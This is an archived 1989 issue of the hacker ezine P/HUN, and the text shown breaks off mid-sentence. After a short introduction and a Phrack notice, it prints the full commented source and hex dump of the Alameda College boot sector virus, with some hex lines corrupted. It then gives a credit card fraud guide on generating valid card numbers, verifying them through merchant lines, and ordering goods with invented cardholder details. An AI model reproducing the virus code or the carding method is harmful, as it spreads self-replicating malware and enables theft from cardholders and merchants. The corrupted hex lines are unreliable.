Copy Link
Add to Bookmark
Report

Phun Volume 2 Issue 4

eZine's profile picture
Published in 
Phun
 · 5 years ago

  

()=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=()



P/HUN Issue #4 , Volume 2 Articles [11]

Released: June 27th of 1989. Comments: SummerCon 89'







=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

= The Toll Center Bulletin Board System =

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



( 2600 Magazine BBS # 5 & P/HUN Magazine Inc. Headquarters)



(718)358/9209



Presents......



-== P/HUN ISSUE IV ==-

--------------

P/HUN Issue #4, Volume 2: Phile 1 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~





Introduction:

-------------

Welcome once again to another exiciting issue of P/HUN Magazine.



We are little behind schedule. The delay was caused by a severe disk crash

which wiped out most of the files. The whole issue had to be put back together

again.



This time we have a special segment called P/HUN Telecom News/Advancements,

which contains the latest news in the telecommunications industry as we know

today. This segment will be released on a regular basis. I would like to thank

DareDevil for taking the first shot it. We would appreciate some feedback on

this new concept.



If you have any articles to contribute please get in touch with us at our

BBS or at our Usenet address.







Red Knight

Usenet Address: pdave@dasys1.UUCP

SysOp of The Toll Center

Phortune 500/Board of Directors

-------------------------------------------------------------------------------

=:Table of Contents:=

------------------



# Phile Description Author Size

-- ------------------------------------------- ------ ------

1) Introduction & Table of Contents Red Knight 2K

2) The Banishment of Phrack Inc. Knight Lightning 5K

3) A Boot Sector Virus Southern Cross 21K

4) Vital Credit Card Information & Usage The Sparrow 31K

5) An Introduction to House Explosives Franz Liszt 19K

6) TSPS No. 1B - Call Processing & Explanation Phelix the Hack 34K

7) Free Computer Magazines Southern Cross 6K

8) A Guide to Hacking AMOS NightCrawler 21K

9) USDN versus ISDN Lord Micro 22K

10) P/HUN Telecom News/Advancements DareDevil 30K

11) P/HUN Telecom News/Advamcements DareDevil 24K



-------------------------------------------------------------------------------



P/HUN Issue #4, Volume 2: Phile 2 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



The Banishment Of Phrack Inc.

-----------------------------

by Knight Lightning



June 27, 1989 - August 28, 1989



Hello. This message is being sent to all members of the Phrack Inc. Mailing

List to forewarn you of things to come. Due to certain policies at the

University Of Missouri - Columbia (UMCVMB), Taran King and I will lose our

Bitnet/Internet accounts on June 27, 1989. I would advise not sending files or

mail to either of our address after June 26, 1989 just to be safe.



Our "exile" from UMCVMB will last until August 28, 1989 when fall classes

begin. However, this does not mean we are putting Phrack Inc. on hold by any

means.



Solution: Anyone who has files to be placed in Phrack Inc. after June 26, 1989

should contact HATCHET MOLLY. He can be reached at "TK0GRM2@NIU.BITNET" or

"TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU". He will be handling the gathering of

files from you... our network friends.



Phrack Inc. Newsletter Issue 27 will be released within the next TWO WEEKS. If

you would like to receive this issue, please let me know as soon as possible.

The reason I make mention of this is because many people on the mailing list

are not currently accessing their work station for a variety of reasons

(school's out, on vacation, etc). So let us know and we will send it to you

when we release it.



The situation with our Bitnet/Internet addresses will not affect SummerCon '89

in any way. However, any issues of Phrack Inc. that we do release between June

27, 1989 and August 28, 1989 will *NOT* be sent over the networks to you until

September 1989. Taran King and I will not have access to the network and will

have no way to send these files until then. So it looks like bulletin boards

and software pirates will get first look during this time period.



So if you have any further questions about this situation, mail us right away.

Remember, any comments or information for Phrack Inc. after June 26, 1989

should be directed to Hatchet Molly.



Knight Lightning Taran King

C483307@UMCVMB.BITNET C488869@UMCVMB.BITNET

C483307@UMCVMB.MISSOURI.EDU C488869@UMCVMB.MISSOURI.EDU



Hatchet Molly

TK0GRM2@NIU.BITNET

TK0GRM2%NIU.BITNET@CUNYVM.CUNY.EDU





"The Real Future Is Behind You!"

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



P/HUN Issue #4, Volume 2: Phile 3 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A BOOT SECTOR VIRUS

5/15/89





The following is a disassembled and commented version of the Alemeda

College Boot infector virus. Courtesy of Southern Cross.





;-----------------------------------------------------------------------;

; This virus is of the "FLOPPY ONLY" variety. ;

; It replicates to the boot sector of a floppy disk and when it gains control

; it will move itself to upper memory. It redirects the keyboard ;

; interrupt (INT 09H) to look for ALT-CTRL-DEL sequences at which time ;

; it will attempt to infect any floppy it finds in drive A:. ;

; It keeps the real boot sector at track 39, sector 8, head 0 ;

; It does not map this sector bad in the fat (unlike the Pakistani Brain)

; and should that area be used by a file, the virus ;

; will die. It also contains no anti detection mechanisms as does the ;

; BRAIN virus. It apparently uses head 0, sector 8 and not head 1 ;

; sector 9 because this is common to all floppy formats both single ;

; sided and double sided. It does not contain any malevolent TROJAN ;

; HORSE code. It does appear to contain a count of how many times it ;

; has infected other diskettes although this is harmless and the count ;

; is never accessed. ;

; ;

; Things to note about this virus: ;

; It can not only live through an ALT-CTRL-DEL reboot command, but this ;

; is its primary (only for that matter) means of reproduction to other ;

; floppy diskettes. The only way to remove it from an infected system ;

; is to turn the machine off and reboot an uninfected copy of DOS. ;

; It is even resident when no floppy is booted but BASIC is loaded ;

; instead. Then when ALT-CTRL-DEL is pressed from inside of BASIC, ;

; it activates and infectes the floppy from which the user is ;

; attempting to boot. ;

; ;

; Also note that because of the POP CS command to pass control to ;

; its self in upper memory, this virus does not to work on 80286 ;

; machines (because this is not a valid 80286 instruction). ;

; ;

; The Norton Utilities can be used to identify infected diskettes by ;

; looking at the boot sector and the DOS SYS utility can be used to ;

; remove it (unlike the Pakistani Brain). ;

;-----------------------------------------------------------------------;

;

ORG 7C00H ;

;

TOS LABEL WORD ;TOP OF STACK

;-----------------------------------------------------------------------;

; 1. Find top of memory and copy ourself up there. (keeping same offset);

; 2. Save a copy of the first 32 interrupt vectors to top of memory too ;

; 3. Redirect int 9 (keyboard) to ourself in top of memory ;

; 4. Jump to ourself at top of memory ;

; 5. Load and execute REAL boot sector from track 40, head 0, sector 8 ;

;-----------------------------------------------------------------------;

BEGIN: CLI ;INITIALIZE STACK

XOR AX,AX ;

MOV SS,AX ;

MOV SP,offset TOS ;

STI ;

;

MOV BX,0040H ;ES = TOP OF MEMORY - (7C00H+512)

MOV DS,BX ;

MOV AX,[0013H] ;

MUL BX ;

SUB AX,07E0H ; (7C00H+512)/16

MOV ES,AX ;

;

PUSH CS ;DS = CS

POP DS ;

;

CMP DI,3456H ;IF THE VIRUS IS REBOOTING...

JNE B_10 ;

DEC Word Ptr [COUNTER_1] ;...LOW&HI:COUNTER_1--

;

B_10: MOV SI,SP ;SP=7C00 ;COPY SELF TO TOP OF MEMORY

MOV DI,SI ;

MOV CX,512 ;

CLD ;

REP MOVSB ;

;

MOV SI,CX ;CX=0 ;SAVE FIRST 32 INT VETOR ADDRESSES TO

MOV DI,offset BEGIN - 128 ; 128 BYTES BELOW OUR HI CODE

MOV CX,128 ;

REP MOVSB ;

;

CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)

;

PUSH ES ;ES=HI ;JUMP TO OUR HI CODE WITH

POP CS ; CS = ES

;

PUSH DS ;DS=0 ;ES = DS

POP ES ;

;

MOV BX,SP ;SP=7C00 ;LOAD REAL BOOT SECTOR TO 0000:7C00

MOV DX,CX ;CX=0 ; DRIVE A: HEAD 0

MOV CX,2708H ; TRACK 40, SECTOR 8

MOV AX,0201H ; READ SECTOR

INT 13H ; (common to 8/9 sect. 1/2 sided!)

JB $ ; HANG IF ERROR

;

JMP JMP_BOOT ;JMP 0000:7C00

;

;-----------------------------------------------------------------------;

; SAVE THEN REDIRECT INT 9 VECTOR ;

; ;

; ON ENTRY: DS = 0 ;

; ES = WHERE TO SAVE OLD_09 & (HI) ;

; WHERE NEW_09 IS (HI) ;

;-----------------------------------------------------------------------;

PUT_NEW_09: ;

DEC Word Ptr [0413H] ;TOP OF MEMORY (0040:0013) -= 1024

;

MOV SI,9*4 ;COPY INT 9 VECTOR TO

MOV DI,offset OLD_09 ; OLD_09 (IN OUR HI CODE!)

MOV CX,0004 ;

;

CLI ;

REP MOVSB ;

MOV Word Ptr [9*4],offset NEW_09

MOV [(9*4)+2],ES ;

STI ;

;

RET ;

;

;-----------------------------------------------------------------------;

; RESET KEYBOARD, TO ACKNOWLEDGE LAST CHAR ;

;-----------------------------------------------------------------------;

ACK_KEYBD: ;

IN AL,61H ;RESET KEYBOARD THEN CONTINUE

MOV AH,AL ;

OR AL,80H ;

OUT 61H,AL ;

XCHG AL,AH ;

OUT 61H,AL ;

JMP RBOOT ;

;

;-----------------------------------------------------------------------;

; DATA AREA WHICH IS NOT USED IN THIS VERSION ;

; REASON UNKNOWN ;

;-----------------------------------------------------------------------;

TABLE DB 27H,0,1,2 ;FORMAT INFORMATION FOR TRACK 39

DB 27H,0,2,2 ; (CURRENTLY NOT USED)

DB 27H,0,3,2 ;

DB 27H,0,4,2 ;

DB 27H,0,5,2 ;

DB 27H,0,6,2 ;

DB 27H,0,7,2 ;

DB 27H,0,8,2 ;

;

;A7C9A LABEL BYTE ;

DW 00024H ;NOT USED

DB 0ADH ;

DB 07CH ;

DB 0A3H ;

DW 00026H ;

;

;L7CA1: ;

POP CX ;NOT USED

POP DI ;

POP SI ;

POP ES ;

POP DS ;

POP AX ;

POPF ;

JMP 1111:1111 ;

;

;-----------------------------------------------------------------------;

; IF ALT & CTRL & DEL THEN ... ;

; IF ALT & CTRL & ? THEN ... ;

;-----------------------------------------------------------------------;

NEW_09: PUSHF ;

STI ;

;

PUSH AX ;

PUSH BX ;

PUSH DS ;

;

PUSH CS ;DS=CS

POP DS ;

;

MOV BX,[ALT_CTRL] ;BX=SCAN CODE LAST TIME

IN AL,60H ;GET SCAN CODE

MOV AH,AL ;SAVE IN AH

AND AX,887FH ;STRIP 8th BIT IN AL, KEEP 8th BIT AH

;

CMP AL,1DH ;IS IT A [CTRL]...

JNE N09_10 ;...JUMP IF NO

MOV BL,AH ;(BL=08 ON KEY DOWN, BL=88 ON KEY UP)

JMP N09_30 ;

;

N09_10: CMP AL,38H ;IS IT AN [ALT]...

JNE N09_20 ;...JUMP IF NO

MOV BH,AH ;(BH=08 ON KEY DOWN, BH=88 ON KEY UP)

JMP N09_30 ;

;

N09_20: CMP BX,0808H ;IF (CTRL DOWN & ALT DOWN)...

JNE N09_30 ;...JUMP IF NO

;

CMP AL,17H ;IF [I]...

JE N09_X0 ;...JUMP IF YES

CMP AL,53H ;IF [DEL]...

JE ACK_KEYBD ;...JUMP IF YES

;

N09_30: MOV [ALT_CTRL],BX ;SAVE SCAN CODE FOR NEXT TIME

;

N09_90: POP DS ;

POP BX ;

POP AX ;

POPF ;

;

DB 0EAH ;JMP F000:E987

OLD_09 DW ? ;

DW 0F000H ;

;

N09_X0: JMP N09_X1 ;

;

;-----------------------------------------------------------------------;

; ;

;-----------------------------------------------------------------------;

RBOOT: MOV DX,03D8H ;DISABLE COLOR VIDEO !?!?

MOV AX,0800H ;AL=0, AH=DELAY ARG

OUT DX,AL ;

CALL DELAY ;

MOV [ALT_CTRL],AX ;AX=0 ;

;

MOV AL,3 ;AH=0 ;SELECT 80x25 COLOR

INT 10H ;

MOV AH,2 ;SET CURSOR POS 0,0

XOR DX,DX ;

MOV BH,DH ; PAGE 0

INT 10H ;

;

MOV AH,1 ;SET CURSOR TYPE

MOV CX,0607H ;

INT 10H ;

;

MOV AX,0420H ;DELAY (AL=20H FOR EOI BELOW)

CALL DELAY ;

;

CLI ;

OUT 20H,AL ;SEND EOI TO INT CONTROLLER

;

MOV ES,CX ;CX=0 (DELAY) ;RESTORE FIRST 32 INT VECTORS

MOV DI,CX ; (REMOVING OUR INT 09 HANDLER!)

MOV SI,offset BEGIN - 128 ;

MOV CX,128 ;

CLD ;

REP MOVSB ;

;

MOV DS,CX ;CX=0 ;DS=0

;

MOV Word Ptr [19H*4],offset NEW_19 ;SET INT 19 VECTOR

MOV [(19H*4)+2],CS ;

;

MOV AX,0040H ;DS = ROM DATA AREA

MOV DS,AX ;

;

MOV [0017H],AH ;AH=0 ;KBFLAG (SHIFT STATES) = 0

INC Word Ptr [0013H] ;MEMORY SIZE += 1024 (WERE NOT ACTIVE)

;

PUSH DS ;IF BIOS F000:E502 == 21E4...

MOV AX,0F000H ;

MOV DS,AX ;

CMP Word Ptr [0E502H],21E4H ;

POP DS ;

JE R_90 ;

INT 19H ; IF NOT...REBOOT

;

R_90: JMP 0F000:0E502H ;...DO IT ?!?!?!

;

;-----------------------------------------------------------------------;

; REBOOT INT VECTOR ;

;-----------------------------------------------------------------------;

NEW_19: XOR AX,AX ;

;

MOV DS,AX ;DS=0

MOV AX,[0410] ;AX=EQUIP FLAG

TEST AL,1 ;IF FLOPPY DRIVES ...

JNZ N19_20 ;...JUMP

N19_10: PUSH CS ;ELSE ES=CS

POP ES ;

CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)

INT 18H ;LOAD BASIC

;

N19_20: MOV CX,0004 ;RETRY COUNT = 4

;

N19_22: PUSH CX ;

MOV AH,00 ;RESET DISK

INT 13 ;

JB N19_81 ;

MOV AX,0201 ;READ BOOT SECTOR

PUSH DS ;

POP ES ;

MOV BX,offset BEGIN ;

MOV CX,1 ;TRACK 0, SECTOR 1

INT 13H ;

N19_81: POP CX ;

JNB N19_90 ;

LOOP N19_22 ;

JMP N19_10 ;IF RETRY EXPIRED...LOAD BASIC

;

;-----------------------------------------------------------------------;

; Reinfection segment. ;

;-----------------------------------------------------------------------;

N19_90: CMP DI,3456 ;IF NOT FLAG SET...

JNZ RE_INFECT ;...RE INFECT

;

JMP_BOOT: ;PASS CONTROL TO BOOT SECTOR

JMP 0000:7C00H ;

;

;-----------------------------------------------------------------------;

; Reinfection Segment. ;

;-----------------------------------------------------------------------;

RE_INFECT: ;

MOV SI,offset BEGIN ;COMPARE BOOT SECTOR JUST LOADED WITH

MOV CX,00E6H ; OURSELF

MOV DI,SI ;

PUSH CS ;

POP ES ;

CLD ;

REPE CMPSB ;

JE RI_12 ;IF NOT EQUAL...

;

INC Word Ptr ES:[COUNTER_1] ;INC. COUNTER IN OUR CODE (NOT DS!)

;

;MAKE SURE TRACK 39, HEAD 0 FORMATTED ;

MOV BX,offset TABLE ;FORMAT INFO

MOV DX,0000 ;DRIVE A: HEAD 0

MOV CH,40-1 ;TRACK 39

MOV AH,5 ;FORMAT

JMP RI_10 ;REMOVE THE FORMAT OPTION FOR NOW !

;

; <<< NO EXECUTION PATH TO HERE >>> ;

JB RI_80 ;

;

;WRITE REAL BOOT SECTOR AT TRACK 39, SECTOR 8, HEAD 0

RI_10: MOV ES,DX ;ES:BX = 0000:7C00, HEAD=0

MOV BX,offset BEGIN ;TRACK 40H

MOV CL,8 ;SECTOR 8

MOV AX,0301H ;WRITE 1 SECTOR

INT 13H ;

;

PUSH CS ; (ES=CS FOR PUT_NEW_09 BELOW)

POP ES ;

JB RI_80 ;IF WRITE ERROR...JUMP TO BOOT CODE

;

MOV CX,0001 ;WRITE INFECTED BOOT SECTOR !

MOV AX,0301 ;

INT 13H ;

JB RI_80 ; IF ERROR...JUMP TO BOOT CODE

;

RI_12: MOV DI,3456H ;SET "JUST INFECTED ANOTHER ONE"...

INT 19H ;...FLAG AND REBOOT

;

RI_80: CALL PUT_NEW_09 ;SAVE/REDIRECT INT 9 (KEYBOARD)

DEC Word Ptr ES:[COUNTER_1] ; (DEC. CAUSE DIDNT INFECT)

JMP JMP_BOOT ;

;

;-----------------------------------------------------------------------;

; ;

;-----------------------------------------------------------------------;

N09_X1: MOV [ALT_CTRL],BX ;SAVE ALT & CTRL STATUS

;

MOV AX,[COUNTER_1] ;PUT COUNTER_1 INTO RESET FLAG

MOV BX,0040H ;

MOV DS,BX ;

MOV [0072H],AX ; 0040:0072 = RESET FLAG

JMP N09_90 ;

;

;-----------------------------------------------------------------------;

; DELAY ;

; ;

; ON ENTRY AH:CX = LOOP COUNT ;

;-----------------------------------------------------------------------;

DELAY: SUB CX,CX ;

D_01: LOOP $ ;

SUB AH,1 ;

JNZ D_01 ;

RET ;

;

;-----------------------------------------------------------------------;

; ;

;-----------------------------------------------------------------------;

A7DF4 DB 27H,00H,8,2



COUNTER_1 DW 001CH

ALT_CTRL DW 0



A7DFC DB 27H,0,8,2



END

;-----------------------------------------------------------------------;

; Hexadecimal representation. ;

;-----------------------------------------------------------------------;

;7C00 FA 31 C0 8E D0 BC 00 7C-FB BB 40 00 8E DB A1 13 z1@.P<.|{;@..[!.

;7C10 00 F7 E3 2D E0 07 8E C0-0E 1F 81 FF 56 34 75 04 .wc-`..@....V4u.

;7C20 FF 0E F8 7D 89 E6 89 F7-B9 00 02 FC F3 A4 89 CE ..x}.f.w9..|s$.N

;7C30 BF 80 7B B9 80 00 F3 A4-E8 15 00 06 0F 1E 07 89 ?.{9..s$h.......

;7C40 E3 89 CA B9 08 27 B8 01-02 CD 13 72 FE E9 38 01 c.J9.'8..M.r~i8.

;7C50 FF 0E 13 04 BE 24 00 BF-E6 7C B9 04 00 FA F3 A4 ....>$.?f|9..zs$

;7C60 C7 06 24 00 AD 7C 8C 06-26 00 FB C3 E4 61 88 C4 G.$.-|..&.{Cda.D

;7C70 0C 80 E6 61 86 C4 E6 61-EB 73 27 00 01 02 27 00 ..fa.Dfaks'...'.

;7C80 02 02 27 00 03 02 27 00-04 02 27 00 05 02 27 00 ..'...'...'...'.

;7C90 06 02 27 00 07 02 27 00-08 02 24 00 AD 7C A3 26 ..'...'.$.-|#&

;7CA0 09 5F 5E 07 1F 58 9D-EA 11 11 1 FB .Y_^..X.j.....{P

;7CB0 53 1E 0E 1F 8B 1E FA 7D-E4 60 88 C4 25 7F 88 S.....z}d`.D%..<

;7CC0 1D 75 04 88 E3 EB 16 3C-38 75 04 88 E7 EB 0E .u..ck.<8u..gk..

;7CD0 FB 08 08 75 08 3C 17 74-11 3C 53 74 8F 89 1E {..u.<.t.<St...z

;7CE0 7D 1F 5B 58 9D EA 87 E9-00 F0 E9 EB 00 BA D8 03 }.[X.j.i.pik.:X.

;7CF0 B8 00 08 EE E8 F3 00 A3-FA 7D B0 03 CD 10 B4 02 ..nhs.#z}0.M.4.

;7D00 31 D2 88 F7 CD 10 B4 01-B9 07 06 CD 108 20 04 1R..4.9..M.8 .

;7D10 E8 D7 00 FA E6 20 8E C1-89 CF BE 80 7B B9 80 00 hW.zfA.O>.{9..

;7D20 FC F3 A4 8E D9 C7 06 64-00 52 7D 8C 0E 66 00 B8 |s$.YG.R}..f.8

;7D30 40 00 8E D8 88 26 17 00-FF 06 13 00 1E B8 00 F0 @..X.&.....8.p

;7D4 8E D8 81 3E 02 E5 E4 21-1F 74 02 CD 19 EA 02 E5 .X.>.ed!.t.M.e

;7D50 00 F0 31 C0 8E D8 A1 10-04 A8 01 75 07 0E 07 E8 .p1@.X!..(.u..

;7D60 EE FE CD 18 B9 04 00 51-B4 00 CD 13 72 0D B8 01 n~M.9..Q4.M.r.8

;7D70 02 1E 07 BB 00 7C B9 01-00 C3 59 73 04 E2 E7 ...;.|9..M.Ys.bg

;780 EB DB 81 FF 56 34 75 05-EA 00 7C 00 00 BE 00 7C k[..V4u|..>.|

;7D90 B9 E6 00 89 F7 0E 07 FC-F3 A6 74 2D 26 FF 06 F8 9f..w..|t-&..x

;7DA0 7D BB 7A 7C BA 00 00 B5-27 B4 05 EB 02 72 1F 8E };z|:..5.k.r..

;7DB0 C2 BB 00 7C B1 08 B8 01-03 CD 13 0E 07 72 0F B9 B;.|1.8....r.9

;7DC0 01 00 B8 01 03 CD 13 72-05 BF 56 34 CD 19 E8 7F ..8..M.rV4M.h.

;7DD0 FE 26 FF 0E F8 7D EB B0-89 1E FA 7D A1 F8 7D BB ~&..x}k0}!x};

;7DE0 40 00 8E DB A3 72 0E9-F7 FE 29 C9 E2 FE 80 EC @..[#r.iwIb~.l

;7DF0 01 75 F9 C3 27 00 08 02-1C 00 00 00 27 00 08 02 .uyC'.....'...

;---------------------------------------------------------------------;

End of commented code for the Alameda College Boot Infector Virus. All

viruses are dangerous.I take no responsibility for damages, outbreaks, or

other ramifications caused by misuse. This phile is for educational purpose

only! I expect everyone to use caution and common sense when dealing with

viruses. Enjoy!



=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=



P/HUN Issue #4, Volume 2: Phile 4 of 11

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



Vital Credit Card Information and Usage



or



Fun with Numbers revision A







Compiled, and made intelligible by The Sparrow



** MANY Thanks to Codebreaker; for without him I would be lost. (in JFK?)

A big thankyou to The White Rider for proof-reading this.

( If you find any mistakes, BLAME HIM!!! HAHAHA)



Hello to: Fry Guy ("You've got to hear about this new scam. . .")

Video Vindicator ("Fly down and let's go casing!")



_____________________________________________________________________________





Completion Date: Tuesday, November Twenty-second, in the year of our Lord, one

thousand, nine hundred, eighty eight, 3:39 am.



Last Updated On: Tuesday, March Twenty-second, in the year of our Lord, one

thousand, nine hundred, eighty nine, 5:01 am.



______________________________________________________________________________



The following is list of ideas and facts that have been brought together for

the sole purpose of educating those who lack this knowledge. In writing this, I

do not intend for the reader to use any information contained herein, but

rather to further his/her own education and provoke thought to perhaps better

the society we live in.



______________________________________________________________________________







I. Card Types



The first digit of the credit card number (henceforth referred to as CCN)

determines the credit card type. A simple list might be:



First Digit of Credit Card Card Type

-------------------------- ---------



3 American Express

4 Visa

5 Mastercard

6 Discover







II. Bank and Branch Numbers



Sample Credit Card: 1234 567 890 123

^

|

Within the first group of numbers from the left [called Group 4] the Bank

name and branch are contained. We have already discovered that the first digit

of Group 4 reveals the card type. We will now look at how to decipher which

bank issued the card, and which branch of the bank the actual card holder banks

at. Look at the Second, Third, and Fourth digits of Group 4. These three

numbers tell which bank issued the card. A small list follows this paragraph,

although you can compile a list by yourself. Just glance at cards you get your

hands on which the bank name is printed, and record the information. [ Editor's

Note: This is a hard concept to explain, so let me give you an example. Lets

say Bank of Hicksville's group 4 Visa Credit Card reads 4560. (560 = Bank of

Hicksville). BUT, 4561 is NOT necessarily Bank of Hicksville, too. 4561 could

be Bank of Booniesville. So what I am trying to get across is that the next

bank in line doesn't HAVE to be 4570 -- it could be earlier in numbers. ]











----------VISA

----



Group 4 Bank Name

-------- ---------

4019 Bank of America

4024 Bank of America

4052 First Cincinatti

4060 Navy Federal Credit Union

4128 Citibank

4131 State Street Bank

4215 Marine Midland

4225 Chase Manhattan

4231 Chase Lincoln First Classic

4232 Chase Lincoln First Classic

4241 Nat. Westminester Bank

4250 First Chicago Bank

4271 Citibank Preferred

4302 H.H.B.C.

4310 Imperial Savings

4317 Gold Dome

4387 Bank One

4428 Bank of Hoven

4811 Bank of Hawaii

4897 Village bank of Cincinatti





----------Mastercards

-----------



Group 4 Bank Name

--------- ---------



5215 Marine Midland

5217 Manufacturers Hanover Trust

5233 Huntington Bank

5242 Chevy Chase Federal Savings

5254 Bank of America

5263 Chemical Bank

5273 Bank of America

5286 Chase Lincoln First

5317 Norwest

5323 Bank of New York

5329 Maryland Bank NA (MBNA)

5410 Citibank Preferred

5411 1st Fin. bank of Omaha

5414 Nat. Westminester Bank

5415 Colonial National Bank

5424 Citibank

5465 Chase Manhattan

5678 Marine Midland







III. Bank Codes [ International Bank or Interlink Numbers]



These are used in checking credit. Later on, you will learn that while

checking the credit cards for the amount of credit, you will be prompted to

enter the Bank ID along with the Merchant ID. The bank IDs are, I believe, from

the following list. One note-- you cannot just choose any Bank ID and use it

with any merchant ID. They must correspond in some way. How, I don't know. I

THINK that a bank issues a merchant number to each of their customers. If you

try to use a merchant number with a bank number, and the merchant doesn't

actually use the bank that is specified by the bank number, you are going to

get some problems. (ie, the verification won't go through.) Again, I will state

that this is only a theory. The reason that I post this theory is to get minds

working. So far, no one has mentioned their ideas on the function of Bank

Codes. If you do happen to find out the true meaning of these numbers, please

get in touch with me so I can update this list. Thanks. One word- on VISA

credit cards, the bank IDs are the first 4 digits of the Card. For Mastercards,

however, they vary. A list follows:



Bank Bank Code

---- ---------

Chemical Bank 1263

Marine Midland 6207 [1207?]

Manufacturers Hanover Trust 1033

Citibank 1035

Huntington 1226

First Card Gold 1286

MBNA 6017

Chase Manhatten 1665

[ Bank from 5127 ] 1015



IV. "Group 3"



Sample Credit Card: 1234 5678 9012 3456

^

|

|

Group 3, or the second group on a credit card in from

the left, contains some VERY useful information about the card. This group

holds the information on the Maximum Expiration Date and the Maximum Credit

Limit. (I believe that you can all see the benefits of this.) This does not

mean, however, that the ACTUAL expiration date and ACTUAL credit limit are in

this group. What it means is this: When the different Credit Card Companies

issue Credit Cards to the consumer, he of course has a credit limit. And when

the Companies formulate credit cards, they create certain groups for certain

customers. That is, certain "groups" contain all the credit cards for people

with a credit limit between $x and $y. The same thing goes with the expiration

dates. Everyone whose card expires after m1/y1 and before m2/y2 has their

credit card in a certain group formulated by the company. For example:

My name is Joe Schmoe. My Visa credit card expires in January of the year 1999.

My credit limit on this card is $7,000. My credit card number (CCN) will

probably be in the same group as my brother-in-law Jack Koff whose card expires

in December of 1998 and whose credit limit is $6,000. BUT, our cards will be in

different groups entirely than my boss' whose card expires in June of 1995 and

whose credit limit is $40,000.

Back to the point of section IV: Lets say you have a credit card with a

known expiration date and known credit limit. Lets also say that you happen

upon ANOTHER credit card whose numbers are the same up until the last 2 groups.

(You and I see that these two cards were issued by the same bank and PROBABLY

have a credit limit in the same ball park and an expiration date not far from

each other. ) BUT, even though you have this new credit card, you lost the

expiration date and credit limit. GOSH! How are you going to use this card when

you don't know this information?? APROXIMATE! You have a general idea now, and

you can go from there.

One warning here: I have found that small groups of cards with high credit

limits are often hidden in between large groups of cards with very low credit

limits. For instance, lets look at this card: 4123 4567 8901 2345. From -4567

until 4600 in group 3 (from the right) gold cards may exist. But after 4600 and

before 4567, cards with credit limits of $500 exist. Kind of sucks, huh?? Just

wanted to make you aware of this.

Now, once you learn how to modify these without hurting the card, you have

increased your value as a carder by 100x. But be careful. Often when you modify

a card's group 3 to get a higher credit limit line of cards, you will find the

entire line is dead. Or, in other cases, just the original card you find is

dead, and all surrounding cards are valid with the new credit limits.



V. "Group 2" & "Group 1"



These two groups, or the last two groups on the credit card, are the

easiest to modify. By changing these in such a way, you can formulate new

credit cards simply by doing a little math in your head. These two groups

contain the IDentification codes. Later on in your carding careers, you might

find out how to change these, and thus, you have found the secret to a vault of

new and awaiting credit cards. I stress here that the only purpose that these

two groups serve is to differentiate between customers. If the first two groups

of two cards are the same and the last two groups of two cards are different,

the two cards were issued by the same bank and probably have similar credit

limits, but are of course issued to different people.



VI. Credit Card Verification



Once you have a newly formulated or newly found Credit Card, you must

first check to see if it is valid before you distribute or use it. The reason

for this is this: Although you may not have faltered in your calculations, and

you created a credit card following the correct formula, the card may turn up

as invalid. This is because it has not been issued yet. Visa or Mastercard has

not issued that card to a customer yet. You are ahead of the credit card

company. (Don't you feel important??!) If this case arises, simply formulate a

new credit card from the original valid credit card, and check it once again.

There is no known way around this except to wait.

OKAY- you want to check your credit card and see how much money this

person has. There are many, many credit verifiers around. The easiest way to

get ahold of one is to go into any store which accepts credit cards and look on

the side of the machine that imprints the carbons with the credit card number,

etc. Or, look right on the wall next to the register. There should be a number

to call, a merchant number, and perhaps a bank number. Jot these down and head

on home. The format for these is usually different, but all have the basic idea

in mind. Call an operator of some sort, tell her the authorization information

that she asks for (bank number,merchant number, etc) and give her the card and

the amount for which to verify the card. She will check and let you know if it

has enough credit left. Simple. BUT***



******************* ONE NOTE **********************

When you check a card for a certain amount of money, that amount of money is

subtracted from the amount available on the card. For example, if a card has

$5,000 left on it, and you get ahold of it and check it for $2,000, you can

only spend $3,000 before it tells you that you don't have the necessary credit

to go through with a transaction.



VII. Purchasing Merchandise: The Real Story



OKAY, now that you have a VALID credit card, you will most likely want to

get some newly acquired merchandise. This is all fine and dandy, but if you

don't know what you are doing, you can get yourself and most likely your

friends in a LOT of trouble.





---------------------------------------------------------------------------

*** WARNING : NEVER ORDER SOMETHING FROM YOUR HOUSE. ALWAYS GO OUT TO A ***

*** PAY PHONE. ALSO, ALWAYS HAVE A STORY WORKED OUT BEFORE YOU CALL. ***

*** THAT IS, YOUR NAME, ADDRESS, JOB, PHONE NUMBER, EXCUSE FOR NOT BEING***

*** HOME, MOTHER'S MAIDEN NAME, ETC. ANY STUTTERING OR HESITATION COULD ***

*** BLOW THE WHOLE SHOW !!! !!! !!! !!! !!! !!! !!! !!! !!! !!!***

---------------------------------------------------------------------------





FIRST- Let me clarify something. When you order something over the phone, and

the person selling you the items wants to know the actual Cardholder's name,

address, phone number, etc, you DO NOT have to give him/her the correct

information. [UNLESS: You do have to give the person correct information if

they have an online connection to a credit record bureau such as CBI or TRW. In

this case, as they can verify everything that you say in a matter of moments,

just do your best, get a new card, and never order from this company again. I

will not lie to you: some companies do have this capability. But if you stick

with little bussinesses who need your money, you'll do fine. ] Bullshit your

way through. Or hire a social engineer to do it for you. You do not even have

to give the correct expiration date! Almost Any expiration date will work as

long as it is at least one month ahead of the current month and it is not TOO

far ahead in time so that it jumped over the actual expiration date. (ie, if

the current date is 10/89, give the expiration date 11/89 -- simple) The

company from which you are buying things can not verify the extra information

YOU give them until after the order has been processed and the package shipped.

They have to get in touch with a Credit Union, which will be discussed later on

in this summary, to verify it all. * ALL THAT THEY CAN VERIFY PRONTO IS THAT

